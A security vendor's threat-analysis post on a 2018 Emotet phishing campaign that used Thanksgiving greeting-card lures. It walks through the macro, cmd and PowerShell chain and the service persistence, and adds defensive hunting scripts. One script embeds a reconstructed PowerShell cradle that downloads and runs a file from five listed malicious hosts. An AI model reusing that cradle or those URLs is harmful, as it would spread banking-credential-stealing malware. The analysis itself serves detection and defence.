November 23, 2018 | By Comodo
Poisoned Gift for Thanksgivingday | Break into Bank Account

Cybercriminals are fond of holidays like Thanksgiving Day, but not for the same reason upstanding people are. For the perpetrators it is the favorite time to attack. Why? Because on such days people are tuned to pleasant thoughts and warm feelings, and unfortunately that makes them more vulnerable. When they see a greeting in the inbox, they feel gratitude and curiosity (who sent it?) and click on the attached file without thinking about the potential danger.

On the eve of this Thanksgiving Day, Comodo specialists intercepted a cunning attack aimed at propagating one of the most nefarious malware families currently active: the Emotet trojan, usually used for stealing banking credentials and other private information.

Usually this malware is spread by finance-related emails, such as a message that poses as a bill-payment alert. Here is an example of such an email intercepted by Comodo.

(Image: "Bill Pay Alert" phishing email)

As you can see, the attackers used a well-prepared message able to deceive even a security-aware user. The link in the email leads to the URL "rozdroza.com/En_us/Clients_Messages/11_18". If the user clicks the link, a Microsoft Office document is automatically downloaded to her machine.

But on the eve of Thanksgiving Day the perpetrators decided to do something special and disguised the infected file as a greeting card. Below are samples of the phishing emails used in the new attack.

(Image: "Thanksgiving Day congratulation" phishing email)

(Image: "Thanksgiving Day wishes" phishing email)

(Image: "Thanksgiving Day Greeting Card" phishing email)

As you can see, these emails are also carefully crafted to look plausible. Their content differs, but in every case it is built to inspire pleasant, warm emotions in the victim. Be it a hearty greeting, admiration for a colleague or even a piece of poetry, it puts the victim in a good mood and so weakens their vigilance.

The quotes from great people at the bottom of the messages are also used to inspire trust in the victims, raising the chances that they will open the document and let the enemy into the house. In reality, the "greeting card" is a Word document carrying a malicious macro that downloads Emotet.

Let's look at the whole kill chain of this cunning malware.

The infected file contains an embedded VBA macro. When a user opens the "greeting card", the macro downloads Emotet to the victim's machine.

Nothing happens until the user acts: the document first asks the user to enable macro content, because the VBA stream it contains is what downloads and executes the malware, and Word will not run it while macros are disabled.

(Image: fake "Office 365" notice asking the user to enable content)

(Image: the Auto Open macro)

If the user allows the active content to run, the macro calls cmd.exe with modified parameters, which in turn calls cmd.exe with obfuscated parameters that finally pass a script to powershell.exe designed to download and run binaries from the internet.

The obfuscated parameters used to launch cmd.exe are stored in a form text box that has been resized so small that the victim does not notice it; the macro simply reads the box's contents and hands them to the shell.

(Image: the hidden command text box)

(Image: Explorer window)

After that, the script probes five locations in turn to download Emotet: anora71.uz/aH3i9EM, egyptmotours.com/EfRRkqPucD, friskyeliquid.com/xspcYyA63, m3produtora.com/QOlBVnrL40, litsey4.ru/V5XLXxDubY. (Treat these purely as indicators of compromise; do not browse to them.)
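The process chain described above (Word to cmd.exe to cmd.exe to powershell.exe) and the list of download locations are what a defender actually gets to see in endpoint telemetry. The following is an added example, not Comodo's code or part of the original analysis: it reconstructs that chain from process-creation events, decodes the PowerShell -EncodedCommand payload, extracts the URLs it tries and matches them against the five locations named in the article. The event layout (pid, parent pid, image, command line, a simplified Sysmon Event ID 1), the process ids, and the download cradle itself are constructed for illustration and are not the real sample's strings.

```python
"""Added example (not Comodo's code): reconstruct the Office -> cmd.exe -> cmd.exe ->
powershell.exe chain from process-creation telemetry, decode the -EncodedCommand
payload and pull the download URLs out of it.

Assumptions: events are a simplified Sysmon Event ID 1 layout (pid, parent pid,
image, command line); the cradle script and process ids below are constructed to
mirror the behaviour described in the article, not the real sample's strings.
"""
import base64
import re

# The five download locations named in the article, used here as IOCs.
EMOTET_URLS = [
    "anora71.uz/aH3i9EM",
    "egyptmotours.com/EfRRkqPucD",
    "friskyeliquid.com/xspcYyA63",
    "m3produtora.com/QOlBVnrL40",
    "litsey4.ru/V5XLXxDubY",
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}

# Constructed cradle: walk the URL list and stop at the first successful download.
CRADLE = (
    "$w=New-Object Net.WebClient;"
    "$u='http://anora71.uz/aH3i9EM@http://egyptmotours.com/EfRRkqPucD@"
    "http://friskyeliquid.com/xspcYyA63@http://m3produtora.com/QOlBVnrL40@"
    "http://litsey4.ru/V5XLXxDubY'.Split('@');"
    "$p=$env:temp+'\\521.exe';"
    "foreach($x in $u){try{$w.DownloadFile($x,$p);Start-Process $p;break}catch{}}"
)


def encode_command(script: str) -> str:
    """powershell.exe -EncodedCommand expects base64 over UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_command(b64: str) -> str:
    return base64.b64decode(b64).decode("utf-16le")


ENCODED = encode_command(CRADLE)

# Constructed process-creation events: (pid, parent pid, image, command line).
EVENTS = [
    (900, 500, r"C:\Windows\explorer.exe", "explorer.exe"),
    (1200, 900, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     r'"WINWORD.EXE" /n "C:\Users\u\Downloads\Greeting_Card.doc"'),
    (1300, 1200, r"C:\Windows\System32\cmd.exe",
     f'cmd /c "cmd /c powershell -nop -w hidden -enc {ENCODED}"'),
    (1304, 1300, r"C:\Windows\System32\cmd.exe",
     f"cmd /c powershell -nop -w hidden -enc {ENCODED}"),
    (1400, 1304, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     f"powershell -nop -w hidden -enc {ENCODED}"),
    # Benign: an admin running a script from Explorer; must not be flagged.
    (2000, 900, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell -NoProfile -File C:\\ops\\inventory.ps1"),
]

ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
URL = re.compile(r"https?://[^\s'\"@;)]+")


def basename(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def ancestry(events, pid):
    """Walk parent pointers from pid to the root; returns image names root-first."""
    by_pid = {e[0]: e for e in events}
    chain = []
    while pid in by_pid:
        _, ppid, image, _ = by_pid[pid]
        chain.append(basename(image))
        pid = ppid
    return chain[::-1]


def analyze(events):
    """Flag every powershell.exe whose ancestry is an Office app followed only by shells."""
    findings = []
    for pid, _, image, cmdline in events:
        if basename(image) != "powershell.exe":
            continue
        chain = ancestry(events, pid)
        office = next((i for i, n in enumerate(chain) if n in OFFICE), None)
        if office is None or not all(n in SHELLS for n in chain[office + 1:]):
            continue
        m = ENC_FLAG.search(cmdline)
        script = decode_command(m.group(1)) if m else cmdline
        urls = URL.findall(script)
        hits = [u for u in urls
                if any(u.split("://", 1)[-1].startswith(ioc) for ioc in EMOTET_URLS)]
        findings.append({
            "pid": pid,
            "chain": chain[office:],
            "hidden_window": bool(re.search(r"-w(?:indowstyle)?\s+hidden", cmdline, re.I)),
            "urls": urls,
            "ioc_hits": hits,
        })
    return findings


if __name__ == "__main__":
    for f in analyze(EVENTS):
        print(f"pid {f['pid']}: {' -> '.join(f['chain'])}  hidden={f['hidden_window']}")
        for u in f["urls"]:
            print("  url:", u, "(IOC match)" if u in f["ioc_hits"] else "")
```

The ancestry check is the part worth keeping even after the URLs rotate: an Office process whose descendants are nothing but cmd.exe and powershell.exe is rare in legitimate use, and the extra cmd.exe hop in this campaign does not help the attacker here because the walk follows parent ids rather than a fixed depth.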

Then it downloads the malware to the user's Temporary folder and executes it. Emotet moves itself to C:\Windows\SysWOW64\cachingplain.exe and creates a service so that it runs at system startup.
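The persistence step above leaves two durable traces: a service installation record and a file written into a Windows system directory by something running from Temp. The following is an added example, not Comodo's code or part of the original analysis, showing how a hunt over that telemetry would surface the cachingplain.exe service. The 7045 ("A service was installed in the system") text layout, the file-write records (whatever your EDR emits, assumed to include the writing process's path), the baseline of known service binaries, and all record contents are constructed for illustration.

```python
"""Added example (not Comodo's code): hunt for the persistence step described above,
a binary written into SysWOW64 and registered as an auto-start service.

Assumptions: service records are a simplified System log 7045 text export, file-write
records are (timestamp, writing process, target) tuples from endpoint telemetry, and
the baseline is a constructed set of service binaries from a clean reference host.
"""
import re

# Constructed 7045 records, separated by a line containing only "---".
SERVICE_EVENTS = """\
Service Name: cachingplain
Service File Name: C:\\Windows\\SysWOW64\\cachingplain.exe
Service Type: user mode service
Service Start Type: auto start
Service Account: LocalSystem
---
Service Name: MozillaMaintenance
Service File Name: "C:\\Program Files (x86)\\Mozilla Maintenance Service\\maintenanceservice.exe"
Service Type: user mode service
Service Start Type: demand start
Service Account: LocalSystem
---
Service Name: WSearch
Service File Name: C:\\Windows\\system32\\SearchIndexer.exe /Embedding
Service Type: user mode service
Service Start Type: auto start
Service Account: LocalSystem
"""

# Constructed file-write records: (timestamp, writing process image, target file).
FILE_WRITES = [
    ("2018-11-19T18:40:01", r"C:\Users\u\AppData\Local\Temp\521.exe",
     r"C:\Windows\SysWOW64\cachingplain.exe"),
    ("2018-11-19T09:12:44", r"C:\Windows\System32\msiexec.exe",
     r"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"),
]

# Constructed baseline: service binaries present on a clean reference image.
BASELINE = {
    "c:\\windows\\system32\\searchindexer.exe",
    "c:\\windows\\system32\\svchost.exe",
}

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
FIELD = re.compile(
    r"^(Service Name|Service File Name|Service Start Type|Service Account):\s*(.*)$", re.M)


def parse_7045(text):
    """Split the export into records; each becomes a dict of the fields we use."""
    records = []
    for block in text.split("\n---\n"):
        fields = dict(FIELD.findall(block))
        if fields:
            records.append(fields)
    return records


def exe_path(service_file_name):
    """Strip arguments and quotes from the image path; lower-case for comparison."""
    s = service_file_name.strip()
    if s.startswith('"'):
        s = s[1:s.index('"', 1)]
    else:
        s = s.split(" ", 1)[0]
    return s.lower()


def findings_for(record, file_writes):
    """Reasons to look at this service; the first one is the gating signal."""
    path = exe_path(record["Service File Name"])
    reasons = []
    if path.startswith(SYSTEM_DIRS) and path not in BASELINE:
        reasons.append("unknown binary in a Windows system directory")
    if record.get("Service Start Type", "").lower().startswith("auto"):
        reasons.append("starts automatically at boot")
    for _, writer, target in file_writes:
        if target.lower() == path and "\\temp\\" in writer.lower():
            reasons.append(f"written by a process running from Temp ({writer})")
    return path, reasons


def hunt(service_text, file_writes):
    """Return (service name, path, reasons) for every unknown service binary living in
    a system directory; the remaining reasons add weight but do not gate."""
    out = []
    for rec in parse_7045(service_text):
        path, reasons = findings_for(rec, file_writes)
        if reasons and reasons[0].startswith("unknown binary"):
            out.append((rec["Service Name"], path, reasons))
    return out


if __name__ == "__main__":
    for name, path, reasons in hunt(SERVICE_EVENTS, FILE_WRITES):
        print(f"{name}: {path}")
        for r in reasons:
            print("  -", r)
```

The baseline comparison is deliberately on the full path rather than the file name: a name like cachingplain.exe looks plausible next to its neighbours in SysWOW64, and the point of the hunt is that nothing on a clean image registers a service from a binary that was not there before.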

(Image: PowerShell parameters)

(Image: service creation)

The newly created service connects to the C&C server to announce its availability and receive commands.

From this moment, the infected machine is under the attackers' full control. They can extract the user's credentials, banking and other private information from the PC and continue the attack by downloading other types of malware.

(Image: attack summary)

"The attack is a complicated poisoned merge of refined, well-disguised malware and psychological manipulation tricks", says Fatih Orhan, the Head of Comodo Threat Research Labs. "It's not only dangerous and destructive from the technical point of view but especially cynical and immoral because it exploits people's bright feelings on a grand holiday. It's always bad to be robbed, but it's much worse to be robbed on such a great holiday and to be aware that the perpetrators used your own bright feelings against you. I'm really glad we protected our customers from these painful consequences and didn't let the perpetrators spoil the celebration of such a grand day."


The heatmap and details of the attack

The attack started on November 19, 2018 at 18:34:12 and was still ongoing at the time of writing. It was conducted from 26 IP addresses in 10 countries. 108 phishing emails had been discovered so far, and the attack was expected to reach its peak on Thanksgiving Day.


The countries involved in the attack and number of emails sent per country

(Image: table of source countries and the number of emails sent from each)

The heatmap

(Image: map of the attack's source locations)

Live secure with Comodo!
